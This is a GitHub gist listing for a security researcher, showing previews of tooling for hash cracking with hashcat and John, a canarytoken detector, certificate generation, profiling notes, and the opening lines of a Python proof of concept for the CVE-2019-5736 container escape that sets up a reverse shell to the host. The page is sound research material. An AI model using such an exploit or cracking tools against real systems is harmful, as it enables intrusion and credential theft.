Skip to content

Instantly share code, notes, and snippets.

View singe's full-sized avatar

Dominic White singe

318 followers · 0 following
View GitHub Profile
@singe
singe / hc-to-john-utf8.sh
Created February 11, 2022 13:25
Hashcat Wordlist Stuff
#!/bin/bash
# Convert hashcat.pot to john.pot and merge them
# Usage: hc-to-john.sh <hashcat pot> <john pot>
# NB: Make sure the hashcat pot only contains 16
# and 32 character hashes that are LM and NT hashes
tmp1=$(mktemp -t pot-port)
tmp2=$(mktemp -t pot-port)
hashpot=$1
LC_ALL=UTF-8 sed 's/^\([a-f0-9]\{32\}:[^:]*\)$/$NT$\1/' $hashpot | grep '^\$NT\$' > $tmp1
@singe
singe / macos_perf_notes.md
Last active January 16, 2022 16:05
macOS Perf Approaches

Remember to compile with debug.

Use DTrace - onCPU

  1. Clone https://github.com/brendangregg/FlameGraph

  2. Trace command sudo dtrace -c '<command>' -o out.stacks -n 'profile-997 /execname == "<command name>"/ { @[ustack(100)] = count(); }' > /dev/null

  3. Create Graph

@singe
singe / get-shift.sh
Created August 11, 2021 21:17
Display the commands required to merge to packet captures and align their time stamps
#!/bin/bash
one=$1
two=$2
if [[ $one == "" || $two == "" ]]; then
echo Display commands to merge two packet captures to the same time
echo $0 "<cap one> <cap two> <offset>"
exit 1
fi
offset=$3
if [[ ! $offset > 0 ]]; then
@singe
singe / README.md
Last active November 7, 2022 19:06
Canarytoken'ed Word .docx yara rule

Remember to unzip the .docx first, or use scan.sh.

Compile the yara rule for scan.sh to work yarac canarytoken.yar canarytoken

@singe
singe / sources.md
Last active September 28, 2020 10:59
Richard Serra & Carlota Fay Schoolman's "Television Delivers People" from March 1973
@singe
singe / README.md
Last active March 19, 2022 03:15
Windows Arabic Code Page (1265) for hashcat

A Windows Arabic Code Page (CP1256) hashcat charset file. Its use is described by hashcat here. The original blog post describing it can be found at NTHashes and Encodings.

@singe
singe / Dockerfile
Last active May 29, 2020 19:49
Simple canary token binary wrapper
FROM alpine:latest as builder
LABEL maintainer="@singe at SensePost <research@sensepost.com>"
RUN apk update && apk --no-cache add \
build-base \
&& rm -rf /var/cache/apk/*
WORKDIR /
COPY yellow.c canary32.c canary32.h /
RUN gcc -o yellow yellow.c canary32.c
@singe
singe / create_certs.sh
Last active February 12, 2025 10:58
A simple tshark EAP certificate extractor and new certificate hierarchy creator.
#!/bin/bash
# Simple CA cert generator & leaf cert signer
# By dominic@sensepost.com
# All rights reserved 2019
ca_prefix="ca"
leaf_prefix="host"
ca_validity="1825" #days
leaf_validity="730" #days
size=2048
@singe
singe / cve-2019-5736.py
Last active June 30, 2025 09:54
PoC for CVE-2019-5736 in Python
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
import os
import stat
host='172.17.0.1'
@singe
singe / xe.sh
Created May 8, 2018 13:11
A super simple script to pull currency info from xe.com
#!/bin/sh
UA="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15"
url="https://www.xe.com/currencyconverter/convert/"
amount="$1"
fromcur="$2"
tocur="$3"
if [ "$fromcur" == "" ]; then #Use default currencies
fromcur="ZAR"
tocur="GBP"
fi